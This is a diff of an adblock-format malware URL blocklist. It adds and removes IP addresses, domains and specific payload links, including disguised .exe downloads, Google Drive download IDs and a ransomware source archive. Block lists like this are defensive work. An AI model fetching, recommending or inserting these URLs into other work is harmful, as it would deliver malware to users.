||111.38.25.34^ ||111.38.26.152^ ||111.38.26.189^ -||111.38.28.137^ ||111.38.8.81^ -||111.42.102.140^ -||111.42.66.178^ +||111.42.66.31^ ||111.43.223.160^ ||111.93.169.90^ ||112.102.84.9^ -||112.132.144.166^ ||112.156.36.178^ ||112.162.160.213^ ||112.164.168.88^ @@ -162,13 +155,15 @@ ||112.165.97.124^ ||112.166.251.121^ ||112.167.148.70^ -||112.17.78.178^ +||112.17.78.186^ ||112.17.80.187^ +||112.17.88.160^ ||112.170.205.85^ ||112.170.23.21^ ||112.170.97.254^ ||112.185.140.99^ ||112.185.93.247^ +||112.186.154.28^ ||112.186.177.103^ ||112.186.35.224^ ||112.187.217.80^ @@ -181,25 +176,27 @@ ||112.27.91.247^ ||112.28.98.61^ ||112.78.45.158^ +||113.11.95.254^ ||113.254.169.251^ ||114.226.23.172^ ||114.226.81.133^ -||114.228.25.10^ ||114.228.25.27^ ||114.229.165.72^ ||114.229.220.216^ +||114.234.195.71^ ||114.234.59.46^ ||114.234.77.127^ ||114.235.81.53^ +||114.239.118.175^ ||114.239.151.41^ +||114.239.173.94^ ||114.239.195.13^ ||114.239.32.117^ -||114.239.80.56^ ||114.79.172.42^ +||115.206.60.63^ ||115.21.29.160^ ||115.49.148.124^ ||115.49.74.99^ -||115.55.234.229^ ||116.206.164.46^ ||116.232.15.162^ ||116.241.138.124^ @@ -267,6 +264,7 @@ ||122.100.76.205^ ||122.160.60.236^ ||122.176.115.28^ +||122.176.39.179^ ||122.176.74.247^ ||123.0.209.88^ ||123.0.240.58^ @@ -292,13 +290,14 @@ ||124.163.30.122^ ||124.6.1.35^ ||124.6.14.208^ +||124.67.89.36^ ||124.67.89.5^ -||124.67.89.70^ ||124.67.89.76^ ||125.130.59.163^ ||125.138.57.208^ ||125.18.28.170^ ||125.209.71.6^ +||125.25.125.73^ ||125.26.165.244^ ||125.79.73.239^ ||128.116.169.210^ @@ -332,19 +331,18 @@ ||14.55.136.146^ ||141.226.94.115^ ||142.169.129.243^ -||144.132.166.70^ ||144.136.155.166^ ||144.139.130.6^ ||146.71.79.230^ ||147.91.212.250^ ||150.129.151.212^ ||150.co.il/AnyDesk.exe$all +||154.16.67.109^ ||154.91.144.44^ ||156.96.157.99^ ||158.69.153.243^ ||159.224.74.112^ ||162.194.28.60^ -||162.212.112.173^ ||162.212.113.176^ ||162.232.82.166^ ||163.13.182.105^ @@ -353,7 +351,6 @@ ||165.90.16.5^ ||171.101.45.90^ ||171.113.39.78^ -||171.15.6.68^ ||172.114.244.127^ ||172.90.37.142^ ||173.160.86.172^ @@ -373,14 +370,13 @@ ||175.11.192.170^ ||175.215.226.31^ ||175.215.57.74^ -||176.107.241.9^ ||176.108.12.36^ ||176.108.58.123^ ||176.113.161.119^ ||176.113.161.120^ ||176.113.161.128^ +||176.113.161.129^ ||176.113.161.136^ -||176.113.161.41^ ||176.113.161.45^ ||176.113.161.48^ ||176.113.161.59^ @@ -426,6 +422,7 @@ ||180.104.239.184^ ||180.104.85.70^ ||180.115.117.241^ +||180.116.238.144^ ||180.123.170.16^ ||180.123.206.251^ ||180.123.247.199^ @@ -438,7 +435,6 @@ ||180.176.208.116^ ||180.177.104.65^ ||180.177.242.73^ -||180.189.104.106^ ||180.214.238.5^ ||180.228.38.207^ ||180.248.80.38^ @@ -456,11 +452,9 @@ ||181.143.70.194^ ||181.193.107.10^ ||181.196.144.130^ -||181.196.148.82^ ||181.197.17.97^ ||181.199.26.39^ ||181.210.45.42^ -||181.210.55.167^ ||181.210.91.139^ ||181.224.242.131^ ||181.239.161.158^ @@ -473,11 +467,13 @@ ||182.222.195.145^ ||182.222.195.192^ ||182.225.254.234^ +||182.233.0.252^ ||182.234.56.8^ ||182.235.252.31^ ||183.100.109.156^ ||183.106.201.118^ ||183.106.49.192^ +||183.107.171.133^ ||183.78.235.57^ ||184.74.135.242^ ||184.88.128.50^ @@ -492,11 +488,9 @@ ||185.172.110.216^ ||185.172.110.241^ ||185.172.110.243^ -||185.172.110.248^ ||185.172.110.250^ ||185.172.111.196^ ||185.172.111.214^ -||185.172.111.221^ ||185.172.111.225^ ||185.172.111.233^ ||185.181.10.234^ @@ -520,7 +514,6 @@ ||186.42.255.230^ ||186.75.140.158^ ||187.12.10.98^ -||187.188.36.184^ ||187.220.1.65^ ||187.220.25.27^ ||187.34.109.179^ @@ -536,6 +529,7 @@ ||188.83.202.25^ ||189.101.79.167^ ||189.126.70.222^ +||189.141.130.30^ ||189.167.42.15^ ||189.181.211.82^ ||189.47.89.132^ @@ -570,7 +564,6 @@ ||190.98.36.201^ ||191.102.123.132^ ||191.103.252.116^ -||191.189.97.206^ ||191.243.36.240^ ||191.255.248.220^ ||191.8.164.19^ @@ -583,7 +576,7 @@ ||193.228.91.124^ ||193.34.21.66^ ||194.15.36.115^ -||194.15.36.52^ +||194.15.36.37^ ||194.152.35.139^ ||194.180.224.192^ ||195.162.70.104^ @@ -598,14 +591,15 @@ ||196.218.53.68^ ||196.221.144.149^ ||196.221.206.232^ +||196.45.151.163^ ||197.155.66.202^ ||197.159.2.106^ ||197.51.235.38^ ||198.46.202.121^ ||199.19.224.46^ +||199.83.203.131^ ||199.83.204.231^ ||199.83.204.88^ -||199.83.205.49^ ||2.180.33.118^ ||2.185.150.180^ ||2.187.7.249^ @@ -644,6 +638,7 @@ ||201.184.241.123^ ||201.187.102.73^ ||201.192.136.240^ +||201.192.165.49^ ||201.203.158.96^ ||201.203.212.194^ ||201.203.27.37^ @@ -654,13 +649,13 @@ ||202.107.233.41^ ||202.133.193.81^ ||202.166.206.80^ +||202.166.217.54^ ||202.191.124.185^ ||202.29.95.12^ ||202.4.124.58^ ||202.51.176.114^ ||202.51.191.174^ ||202.74.236.9^ -||202.79.46.30^ ||203.129.254.50^ ||203.146.208.208^ ||203.163.211.46^ @@ -696,7 +691,6 @@ ||211.223.103.131^ ||211.224.10.169^ ||211.250.23.192^ -||211.34.180.141^ ||211.48.208.144^ ||211.50.54.124^ ||211.57.175.216^ @@ -714,6 +708,7 @@ ||213.123.206.197^ ||213.16.63.103^ ||213.215.85.141^ +||213.27.8.6^ ||213.57.149.98^ ||213.57.78.231^ ||213.7.222.78^ @@ -721,7 +716,6 @@ ||213.92.198.8^ ||216.170.126.102^ ||216.170.240.98^ -||216.180.117.248^ ||216.183.54.169^ ||216.36.12.98^ ||217.11.75.162^ @@ -732,12 +726,9 @@ ||217.8.117.76^ ||218.150.83.71^ ||218.151.35.116^ -||218.156.132.7^ ||218.156.41.163^ ||218.157.214.219^ -||218.21.170.238^ -||218.21.170.249^ -||218.21.171.246^ +||218.161.23.184^ ||218.255.247.58^ ||218.32.118.1^ ||218.32.98.172^ @@ -753,7 +744,6 @@ ||219.68.251.32^ ||219.68.5.140^ ||219.69.71.186^ -||219.70.238.66^ ||219.70.63.196^ ||219.71.191.152^ ||219.80.217.209^ @@ -764,26 +754,31 @@ ||220.70.249.177^ ||220.82.140.17^ ||220.88.113.136^ +||220.90.87.32^ ||220.92.168.176^ ||221.124.78.15^ ||221.144.153.139^ ||221.152.34.93^ ||221.155.30.60^ ||221.166.254.127^ +||221.210.211.12^ ||221.226.86.151^ +||221.229.144.191^ +||221.5.30.247^ ||222.102.63.41^ ||222.116.70.13^ ||222.185.151.16^ ||222.185.42.110^ ||222.187.188.200^ ||222.188.190.206^ +||222.217.65.112^ ||222.239.83.232^ ||222.243.14.67^ ||222.65.161.192^ ||222.67.116.43^ -||222.74.186.132^ ||222.74.186.174^ ||222.80.55.131^ +||223.93.157.244^ ||23.112.74.204^ ||23.122.183.241^ ||23.228.143.58^ @@ -814,11 +809,12 @@ ||27.115.161.208^ ||27.116.84.57^ ||27.122.56.147^ -||27.123.241.20^ ||27.147.29.52^ ||27.147.40.128^ +||27.158.250.210^ ||27.238.33.39^ -||27.41.157.216^ +||27.41.135.16^ +||27.41.143.216^ ||3.zhzy999.net/images/n.exe$all ||3.zhzy999.net3.zhzy999.net/images/n.exe$all ||31.128.173.853.zhzy999.net/images/n.exe$all @@ -826,11 +822,13 @@ ||31.13.23.180^ ||31.14.40.55^ ||31.146.229.169^ +||31.154.232.106^ ||31.168.153.60^ ||31.168.178.71^ ||31.168.179.83^ ||31.168.191.243^ ||31.168.194.67^ +||31.168.214.28^ ||31.168.216.132^ ||31.168.218.78^ ||31.168.24.115^ @@ -847,14 +845,16 @@ ||31.211.144.10^ ||31.211.148.144^ ||31.211.159.149^ -||31.25.134.209^ ||31.30.119.23^ ||31.44.54.110^ ||35.141.217.189^ ||36.107.233.232^ ||36.32.71.33^ +||36.33.129.122^ +||36.66.139.36^ +||36.66.168.45^ ||36.67.152.161^ -||36.67.152.163^ +||36.68.114.179^ ||36.74.74.99^ ||36.89.18.133^ ||36.91.89.187^ @@ -865,6 +865,8 @@ ||37.34.179.221^ ||37.34.251.39^ ||37.49.224.138^ +||37.49.224.209^ +||37.49.224.213^ ||37.49.224.231^ ||37.49.230.45^ ||37.54.14.36^ @@ -879,11 +881,12 @@ ||41.211.112.82^ ||41.219.185.171^ ||41.32.132.218^ +||41.32.170.13^ ||41.32.211.177^ ||41.38.51.251^ ||41.39.182.198^ ||41.41.249.54^ -||41.79.234.90^ +||41.86.21.60^ ||42.228.80.137^ ||42.61.176.214^ ||42.61.99.155^ @@ -892,7 +895,7 @@ ||42502d2a-e7ed-4a16-9f11-33ffe6c54021.usrfiles.com^ ||43.230.159.66^ ||43.252.8.94^ -||45.115.254.154^ +||45.114.68.156^ ||45.138.89.88^ ||45.139.236.14^ ||45.139.236.5^ @@ -908,17 +911,18 @@ ||45.4.56.54^ ||45.50.228.207^ ||45.50.56.90^ +||45.63.54.207^ ||45.64.147.4^ -||45.84.196.121^ ||45.95.168.118^ +||45.95.168.122^ ||45.95.168.126^ ||45.95.168.173^ ||45.95.168.214^ -||45.95.168.219^ ||45.95.168.230^ ||45.95.168.248^ ||45.95.168.93^ ||45.95.168.97^ +||46.100.57.58^ ||46.107.48.22^ ||46.12.230.46^ ||46.121.82.70^ @@ -942,6 +946,7 @@ ||47.187.120.184^ ||47.216.90.96^ ||47.46.231.38^ +||49.12.32.67^ ||49.143.32.92^ ||49.143.43.93^ ||49.156.35.166^ @@ -959,17 +964,19 @@ ||49.213.193.250^ ||49.213.214.130^ ||49.236.213.248^ -||49.246.91.131^ ||49.68.131.194^ ||49.68.184.18^ ||49.68.207.198^ ||49.68.223.89^ -||49.68.226.118^ +||49.70.106.4^ +||49.70.127.96^ ||49.70.235.234^ ||49.81.106.68^ +||49.81.134.246^ ||49.81.141.138^ ||49.81.156.134^ ||49.81.156.149^ +||49.81.40.23^ ||49.82.212.34^ ||49.89.184.116^ ||49.89.228.63^ @@ -978,14 +985,13 @@ ||5.182.211.220^ ||5.185.85.122^ ||5.19.248.85^ +||5.198.244.91^ ||5.201.142.118^ -||5.201.176.65^ ||5.206.227.228^ ||5.26.149.86^ ||5.26.90.208^ ||5.29.175.150^ ||5.43.104.68^ -||5.45.164.187^ ||5.89.232.197^ ||5.94.215.178^ ||5.95.226.79^ @@ -994,9 +1000,9 @@ ||50.27.159.137^ ||50.35.77.32^ ||50.75.198.219^ +||50.76.147.249^ ||50.89.246.247^ ||50.98.100.191^ -||51.75.210.192^ ||52.255.143.183^ ||58.114.246.26^ ||58.142.166.120^ @@ -1023,6 +1029,7 @@ ||59.31.255.134^ ||59.4.10.137^ ||59.7.40.82^ +||61.147.48.95^ ||61.19.155.181^ ||61.247.224.66^ ||61.56.182.218^ @@ -1035,6 +1042,7 @@ ||61.70.110.59^ ||61.70.132.195^ ||61.70.45.130^ +||61.70.45.81^ ||61.75.239.55^ ||62.1.98.131^ ||62.103.77.120^ @@ -1052,6 +1060,7 @@ ||62.82.172.42^ ||62.90.219.154^ ||63.245.122.93^ +||63.78.214.55^ ||64.233.154.99^ ||64.53.172.125^ ||65.125.128.196^ @@ -1091,7 +1100,6 @@ ||71.71.60.69^ ||72.17.60.150^ ||72.175.154.9^ -||72.181.243.237^ ||72.186.129.13^ ||72.186.139.38^ ||72.227.229.129^ @@ -1167,6 +1175,7 @@ ||79.180.192.40^ ||79.2.211.133^ ||79.41.117.236^ +||79.62.235.37^ ||79.79.58.94^ ||79.8.70.162^ ||7p22jz.chokun.ru^ @@ -1201,7 +1210,6 @@ ||82.155.22.188^ ||82.166.57.2^ ||82.166.86.58^ -||82.177.126.97^ ||82.207.61.194^ ||82.207.87.234^ ||82.208.149.161^ @@ -1250,6 +1258,7 @@ ||85.25.213.151^ ||85.64.181.50^ ||85.66.237.14^ +||85.89.163.4^ ||86.122.55.15^ ||86.125.99.137^ ||86.18.117.139^ @@ -1275,7 +1284,6 @@ ||89.216.122.78^ ||89.22.152.244^ ||89.237.68.128^ -||89.252.143.70^ ||89.40.85.166^ ||89.40.87.5^ ||90.171.195.136^ @@ -1317,6 +1325,7 @@ ||94.21.191.188^ ||94.230.152.192^ ||94.244.113.217^ +||94.41.0.174^ ||94.53.120.109^ ||94.64.246.247^ ||95.167.71.245^ @@ -1346,11 +1355,13 @@ ||98.30.24.54^ ||99.151.48.175^ ||99.2.198.29^ +||99.232.224.138^ ||99.3.72.74^ ||99.50.211.58^ ||a-reality.co.uk^ ||abass.ir^ ||accessyouraudience.com^ +||acteon.com.ar^ ||activecost.com.au^ ||admaris.ir^ ||admin.foa.ae^ @@ -1368,6 +1379,8 @@ ||al-wahd.com^ ||alacatibisiklet.com^ ||alba1004.co.kr^ +||alexliasko.co.ug^ +||alexliasko.ug^ ||algorithmshargh.com^ ||allloveseries.com^ ||alohasoftware.net^ @@ -1377,6 +1390,8 @@ ||amemarine.co.th^ ||andreelapeyre.com^ ||andremaraisbeleggings.co.za^ +||aneoeauhiazegfiz.ru/o.exe$all +||aneoeauhiazegfiz.ru/t.exe$all ||angthong.nfe.go.th^ ||anvietpro.com^ ||anysbergbiltong.co.za^ @@ -1394,6 +1409,7 @@ ||azzd.co.kr^ ||b.frefou.ru^ ||babaroadways.in^ +||backgrounds.pk^ ||bamakobleach.free.fr^ ||bangkok-orchids.com^ ||bapo.granudan.cn^ @@ -1413,7 +1429,7 @@ ||cameli.vn^ ||cameraforce.tv^ ||cbk.m.dodo52.com^ -||cdn-10049480.file.myqcloud.com^ +||cbup1.cache.wps.cn/powerword/update/2016.3.3.0332/selfpatch/update.exe$all ||cellas.sk^ ||cf.uuu9.com^ ||cfs5.tistory.com^ @@ -1430,16 +1446,13 @@ ||ckl6767.com^ ||clearwaterriveroutfitting.com^ ||codeload.github.com/MeteorAdminz/hidden-tear/zip/master$all -||colourcreative.co.za^ ||commaa.com^ ||complan.hu^ ||complanbt.hu^ ||comtechadsl.com^ -||config.cqhbkjzx.com^ ||config.kuaisousou.top^ -||config.wwmhdq.com^ +||config.younoteba.top^ ||cqjcc.org^ -||crc2k18.mooo.com^ ||crisalic.fr^ ||crittersbythebay.com^ ||csnserver.com^ @@ -1452,6 +1465,7 @@ ||da.alibuf.com^ ||danielbastos.com^ ||darco.pk^ +||data.kaoyany.top^ ||data.over-blog-kiwi.com^ ||datapolish.com^ ||datvensaigon.com^ @@ -1509,6 +1523,8 @@ ||download.rising.com.cn^ ||download.skycn.com^ ||download.xp666.com/xzqswf/DTPageSet.exe$all +||download.xp666.com/xzqswf/app/setpagem.exe$all +||download.xp666.com/xzqswf/setpagem.exe$all ||download.zjsyawqj.cn^ ||download301.wanmei.com^ ||dpeasesummithilltoppers.pbworks.com^ @@ -1522,6 +1538,7 @@ ||dreamtrips.cheap/dreamtrips_us5.exe$all ||drive.google.com.it-barcelona.com/frm0reseen/PrntScrnOfAMZOrderID.jpg.exe$all ||drive.google.com/u/0/uc?id=12iFCPIkFttDepyF-50TP5ToEO5PUJTkl&export=download$all +||drive.google.com/u/0/uc?id=17MK_rc41hpFJXpVYtF8tkeWaczBfoDTK&export=download$all ||drive.google.com/u/0/uc?id=1I0-c_3_PA4CFUVxQuWatIce-YMim6K1F&export=download$all ||drive.google.com/u/0/uc?id=1eTpnW0duzQkICbaRy8106mv9IfelETF1&export=download$all ||drive.google.com/u/0/uc?id=1lf5uj0OZtEz0Da4uloCglElnO0cqqaJ7&export=download$all @@ -1540,22 +1557,29 @@ ||drive.google.com/uc?id=13rTqmEw0lHEDa_wXQSw0KI24xn1nDFQB&export=download$all ||drive.google.com/uc?id=14y_4HYfQwhCvzMaVfNnEDj7IR9Nuxm1K&export=download$all ||drive.google.com/uc?id=15UTvz9E9kgBqPQh87xLaZzbp3rOP3g2t&export=download$all +||drive.google.com/uc?id=15mI9KSEuwl_wsS8S3LJwb2FcIHbSbm08&export=download$all ||drive.google.com/uc?id=16tp0IOdfmnfufmuoz5IIBWl9O4NyS_hX&export=download$all +||drive.google.com/uc?id=171sjKm4dE3BDRjMPH_KiL9VW6Q_Hrw9K&export=download$all +||drive.google.com/uc?id=17HM5rH8-k-9i5xdKZro7QprMFDmH50S8&export=download$all ||drive.google.com/uc?id=18zj7g3KQJ7bDXszqBS8rLt_2Wip66bVR&export=download$all ||drive.google.com/uc?id=19vU1VkPmiJ58uyP_UeeuhGAB5sB4bxAp&export=download$all +||drive.google.com/uc?id=1BdR4L1TYa3K2GnSa75ADdBppHZBa7-ed&export=download$all ||drive.google.com/uc?id=1D3NjICn2RJXxpMYKNJ7KF-n7MYnObw7F&export=download$all +||drive.google.com/uc?id=1E3fBq0KE5bRJQWhXpOcRJfH4koP2u2Yt&export=download$all ||drive.google.com/uc?id=1F7lZWTsnxJpLeNPWHxjHYrxtq0bb3sKn&export=download$all +||drive.google.com/uc?id=1FMh4uRMRHBQeb620WgaFHXtJRb3SQCde&export=download$all ||drive.google.com/uc?id=1H8B2uqA_OhfEqZ3rsMitf215JCc3Uccy&export=download$all ||drive.google.com/uc?id=1I-m-Zdvb1MI-EE99NWHEPjL8qWaX7E0U&export=download$all -||drive.google.com/uc?id=1J0OilLtgVEjK-pZs3nr6JqXhwV4XpL_Z&export=download$all ||drive.google.com/uc?id=1Jd-fg_69lzQii2dHdah9bVcU9EFddRHU&export=download$all ||drive.google.com/uc?id=1JmECsHqy6HjTxpjASVw-SNz0zKfNr2WJ&export=download$all ||drive.google.com/uc?id=1JqHbzSyi5e_xgTFAOmsM9Q9C3p1kEobk&export=download$all ||drive.google.com/uc?id=1KETGDx1w0kDxMz5IczKJyZgWld9e5c1z&export=download$all ||drive.google.com/uc?id=1KLvNsXJIRxAcGQE6EIK_cTXsk-lfFS05&export=download$all +||drive.google.com/uc?id=1KNQ3yXeap3r--mdyimno8MAA6dCCVVJ9&export=download$all ||drive.google.com/uc?id=1KftUycky_tXa8SVzMcOK2X3uANZN1V0t&export=download$all ||drive.google.com/uc?id=1KqpMGwV_KEsl41W2fcb6bm2ZtkULFc2h&export=download$all ||drive.google.com/uc?id=1KrS8y_CyFXY9BpqaUeWhQ_hYhWyjhK4N&export=download$all +||drive.google.com/uc?id=1LhafSS6su5DEIN9yyNuQG59h1CvunBvB&export=download$all ||drive.google.com/uc?id=1MHQ9tNqy3Q0LO-AO6MYt7HjN5erwG0uT&export=download$all ||drive.google.com/uc?id=1MV5sWw5SnUpR0B3qEodOdVPKyJN_yb3F&export=download$all ||drive.google.com/uc?id=1Mt0n18Ygg8LjNYMZAL2-rhnac1akjwRV&export=download$all @@ -1569,28 +1593,41 @@ ||drive.google.com/uc?id=1RBWxvlXqiYIHkJ2hd1JGx_p5wrmjKrhv&export=download$all ||drive.google.com/uc?id=1RUJwADhp6K0AzbersMvzoisVyZU7iBZN&export=download$all ||drive.google.com/uc?id=1S8cPTRhyQzVK7zMuIiRazfn0JDdDawjy&export=download$all +||drive.google.com/uc?id=1Sfzt17of6fhHwrLcjvvBbz7_oFNQkBz_&export=download$all ||drive.google.com/uc?id=1TPi_ktVkdrRCy3pqxJMltZcNTmsdlHvJ&export=download$all +||drive.google.com/uc?id=1UM7LLwZG_6JrCMimZKCPchKpaHX-OqEw&export=download$all +||drive.google.com/uc?id=1V33RvQYtik_05G8L7j1ZOh2bFRSED1jO&export=download$all ||drive.google.com/uc?id=1VDUxzMBBpukfU3kMdBmPYfYWG3Z89MM_&export=download$all +||drive.google.com/uc?id=1WGF1tFV-45XAnPsCiM_-Qa1jVcvmu2L0&export=download$all +||drive.google.com/uc?id=1WTH7IEtiZxJDXTT08KXqmwWPg06JHKny&export=download$all ||drive.google.com/uc?id=1Wc7guj9eHqpGNlncefZREXWZNH0aWUsx&export=download$all ||drive.google.com/uc?id=1Wfn51WwJjih0AVzq_5aGraRrFBRi9IVZ&export=download$all ||drive.google.com/uc?id=1WrCjviMqwu9VxhiYZ4faDp16H_UvjbvA&export=download$all +||drive.google.com/uc?id=1X09LDaOz_IjMg7N-pP8BF_Tnnm8QnExR&export=download$all ||drive.google.com/uc?id=1XclZGNQcpOS9_-Gp-kZ0p7Nzn7LQMwPx&export=download$all -||drive.google.com/uc?id=1XqaFobWVywSXdXFrLJLqg5noCKYosbxw&export=download$all +||drive.google.com/uc?id=1XlTPt0V8Bjg7dEnzwwpkb2hoEE2H8tM_&export=download$all ||drive.google.com/uc?id=1Y0dcICAr-DK7p1kuP8r1QKd5jfCkbVvc&export=download$all ||drive.google.com/uc?id=1YgSHo_ejaRcEGzhVTgWmWu11HI9abPZh&export=download$all ||drive.google.com/uc?id=1ZLSUfV4_JuwmjeYprs6ddeCIT_-m_-k9&export=download$all +||drive.google.com/uc?id=1Zq2cIRaaNM7TRVbn9UmdCzzv8XJDx0uH&export=download$all ||drive.google.com/uc?id=1ZsGTNlGoFFC-Tgft7aEAND_S4wS5Yxmz&export=download$all +||drive.google.com/uc?id=1_3nQMmF63589FwDZg4aiGfsKF47kdXb9&export=download$all ||drive.google.com/uc?id=1_J9KF7cYxbo08SxySiDW_A5SpNjH8Y3E&export=download$all ||drive.google.com/uc?id=1_NJaUwl89anjer5NcClT2VXJ4WBkM7HN&export=download$all +||drive.google.com/uc?id=1aUVdetSgECiOL-VvMzdQlw3JEQU9ejht&export=download$all ||drive.google.com/uc?id=1b-9llLol3vmCcpCI53tbCtW9ez5U6GKL&export=download$all ||drive.google.com/uc?id=1bB21XsLvOqVr7HeebwTxaKNbdSy_PHXW&export=download$all ||drive.google.com/uc?id=1c10EoOChw7ScLuCVP3mXaoNyrOVjFNKe&export=download$all +||drive.google.com/uc?id=1cHcVxXjycwGrlloXfwfwyuBYb8AbYhDK&export=download$all ||drive.google.com/uc?id=1ccLiEtHnCmWGsVia8uZyQZcZyWxZbwwE&export=download$all ||drive.google.com/uc?id=1cn5ISDc2CQeyenvhyQxd2IHPIMBqleRG&export=download$all ||drive.google.com/uc?id=1dIfbX6Le_594WZUuWY3eYsNL12_-jRVP&export=download$all ||drive.google.com/uc?id=1e18RJ3xLqJPL5A_FTe1PtFDORun5h_Jl&export=download$all ||drive.google.com/uc?id=1eOzacxbxvlB9F9nInX3fdP8sjjlthi3W&export=download$all ||drive.google.com/uc?id=1eh3cqzgCx2RPJmKMJ9qJwZVYDf5oKI6R&export=download$all +||drive.google.com/uc?id=1emlap-VVjPLvplwk1BlUfZPCZmwDnIcR&export=download$all +||drive.google.com/uc?id=1er-HsVxQERfsHnK-TYAQWzE6_TO55yj-&export=download$all +||drive.google.com/uc?id=1f1d3rde5hbGpubc2ovPffFUpgVfegqj9&export=download$all ||drive.google.com/uc?id=1f5wJV8kPvxOtLgLmu5Uut92pY4v2n6hE&export=download$all ||drive.google.com/uc?id=1f74a7W00t2B8bNTNUyavEwZeV-VRE5o4&export=download$all ||drive.google.com/uc?id=1fiziqiVBMyQmOBhCOdMq6s0AYH0NF5Mc&export=download$all @@ -1607,25 +1644,31 @@ ||drive.google.com/uc?id=1l06AEr-fxG9aUAK072ZOP5z9jXOCNzj4&export=download$all ||drive.google.com/uc?id=1lXDqsyZ6McKbLWRdrcSiJJ707fxjZmlT&export=download$all ||drive.google.com/uc?id=1mD5PFNaCbC3L0u1RJ613ABNqooz9YOYK&export=download$all +||drive.google.com/uc?id=1mkGI8ClTDbpAXPeKvfUeBxBFZZqTEve1&export=download$all ||drive.google.com/uc?id=1nAmpLZotYqyFBUcLOlyv5GGKQYzHXZ04&export=download$all ||drive.google.com/uc?id=1nMAOa5vbNOLS-dZxyxl1IwvuclszEWx1&export=download$all ||drive.google.com/uc?id=1nNZne0SRFV72I_YtZQR_tlIolJNFJOYL&export=download$all ||drive.google.com/uc?id=1nUx01QN68doArMSY5zofVlVQUJwHSEb3&export=download$all ||drive.google.com/uc?id=1oE5CyxxObqvNcnC3CM_Emm2Hd_m8ec7m&export=download$all ||drive.google.com/uc?id=1pEr7rbgoq6CYiJprApUJOinw3Yppj6oe&export=download$all -||drive.google.com/uc?id=1qJT-8-sjc1r9MophWSpa3fKeYy-Cmjbq&export=download$all +||drive.google.com/uc?id=1rRnkMBmRZq569nRYv0xiJt7Ne2sdpaYN&export=download$all ||drive.google.com/uc?id=1rdZ9utaKBTR0rI9pGcCVFw0GcT9Ubzo7&export=download$all ||drive.google.com/uc?id=1ri7pvJwMlx53joETQgQ7W7_w6bHFhLds&export=download$all +||drive.google.com/uc?id=1slNk15jy2OOsxF2I_CatbBIryT8DcJgL&export=download$all ||drive.google.com/uc?id=1snrBLsfs9VWR5AQicvJlMUn_9o3FFve0&export=download$all ||drive.google.com/uc?id=1t8YRAHKM74KcWjsWzzdw-UiwMNoqimmq&export=download$all ||drive.google.com/uc?id=1tTF4lz9irAfRDJUJxPT8DdbXLWesiHyE&export=download$all ||drive.google.com/uc?id=1tUSojcvJXngze9cnRE5biBLCUbEQosQp&export=download$all +||drive.google.com/uc?id=1uLm8t4iW_mvS3Ak9csJZdIflRw-XEd30&export=download$all ||drive.google.com/uc?id=1vhqTMqaZLqYLyuLVIuwBVI5hrpWhweM4&export=download$all +||drive.google.com/uc?id=1w3oR4guf6JzS2Dx2n3JxVsq6OHOaQyn8&export=download$all ||drive.google.com/uc?id=1wEGCbnP8C-BA48mwsW4CbincuNurDsbV&export=download$all +||drive.google.com/uc?id=1wc4G7ZYZTplMHtG2IkWU57fskmLHy1tf&export=download$all ||drive.google.com/uc?id=1zLQBgYxBZpj1A34ub4EUnahIFX2a4Ytp&export=download$all ||drive.google.com/uc?id=1zOAa0crJJyjs3DTQk_M_ZqG9gStxV2FG&export=download$all ||drive.google.com/uc?id=1zpS--8sfyN8bSD4ghtmaXu3yzha6apH6&export=download$all ||drools-moved.46999.n3.nabble.com^ +||dudulm.com^ ||dw.58wangdun.com^ ||dx.qqyewu.com^ ||dx1.qqtn.com^ @@ -1633,7 +1676,6 @@ ||dzinestudio87.co.uk^ ||e-mudhra.com/downloads/eMclick.zip$all ||e.dangeana.com^ -||ecoshore.ga^ ||edicolanazionale.it^ ||elokshinproperty.co.za^ ||emadamini.co.za^ @@ -1650,6 +1692,7 @@ ||fidiag.kymco.com^ ||files.constantcontact.com/0996938c001/6e8a2a4f-40ac-464f-9a70-7c67f0a0da19.pdf$all ||files.constantcontact.com/ee304de9001/7e533e73-e272-4a44-9d9e-138cab64bf19.docx$all +||files.fqapps.com^ ||files.rakbot.ru^ ||files6.uludagbilisim.com^ ||firebasestorage.googleapis.com/v0/b/dksloey-dukun.appspot.com/o/Firehack.apk?alt=media&token=661aeab2-e1cf-4889-869a-930b8860a823$all @@ -1661,6 +1704,7 @@ ||fotobooth.at^ ||frin.ng^ ||fstation.dynu.net^ +||fte.m.dodo52.com^ ||ftpftpftp.com^ ||funletters.net^ ||fusionfiresolutions.com^ @@ -1681,6 +1725,7 @@ ||grafchekloder.rebatesrule.net^ ||greattastesmb.ca^ ||green100.cn/wp-admin/sites/4hmwi1hb/8zn7-4791619283-794696702-hdox5rgy8y-yvhfweixygqa/$all +||greenpalace.top^ ||gssgroups.com^ ||gvpcdpgc.edu.in^ ||h8y9u9b2.ssl.hwcdn.net/APSFADexpNR/dynlink_1594433895121.exe$all @@ -1694,8 +1739,9 @@ ||hfsoftware.cl^ ||hldschool.com^ ||hmbwgroup.com^ -||hostingcloud.racing/7991.js$all +||hoayeuthuong-my.sharepoint.com^ ||hostzaa.com^ +||hotart.co.nz^ ||hotel-le-relais-des-moulins.com^ ||housewifes.co^ ||hseda.com^ @@ -1709,6 +1755,7 @@ ||inapadvance.com^ ||incrediblepixels.com^ ||incredicole.com^ +||inigbiseijfji.ru^ ||interbus.cz/templates/jsn_dome_free/js/payments/2c.jpg$all ||intersel-idf.org^ ||isso.ps^ @@ -1716,6 +1763,7 @@ ||izu.co.jp/~saigo/25072019_1120.xls$all ||izu.co.jp/~saigo/C354883.xls$all ||jamiekaylive.com^ +||jamshed.pk^ ||jansen-heesch.nl^ ||janvierassocies.fr^ ||javatank.ru^ @@ -1730,10 +1778,11 @@ ||jsya.co.kr^ ||jutvac.com^ ||jvalert.com^ +||k.ludong.tv^ ||kachsurf.mylftv.com^ ||kamasu11.cafe24.com^ -||kankalarnetwork.duckdns.org^ ||kanok.co.th^ +||kanorkanor23.ru^ ||karavantekstil.com^ ||kdsp.co.kr^ ||kejpa.com^ @@ -1744,7 +1793,6 @@ ||kimyen.net/upload/VLTKNhatRac.exe$all ||kjbm9.mof.gov.cn^ ||kjcpromo.com^ -||kleinendeli.co.za^ ||knightsbridgeenergy.com.ng^ ||kqq.kz/wp-content/plugins/wp-db-ajax-made/1$all ||kqq.kz/wp-content/plugins/wp-db-ajax-made/2$all @@ -1777,10 +1825,11 @@ ||m.0757kd.cn^ ||m93701t2.beget.tech^ ||mackleyn.com^ +||mammalson.com^ ||maringareservas.com.br^ ||marketinfosales.com^ ||marketprice.com.ng^ -||mattayom31.go.th^ +||marksidfgs.ug^ ||mazury4x4.pl^ ||mbgrm.com^ ||medianews.ge^ @@ -1799,7 +1848,6 @@ ||mffyjcdn.btgame.com^ 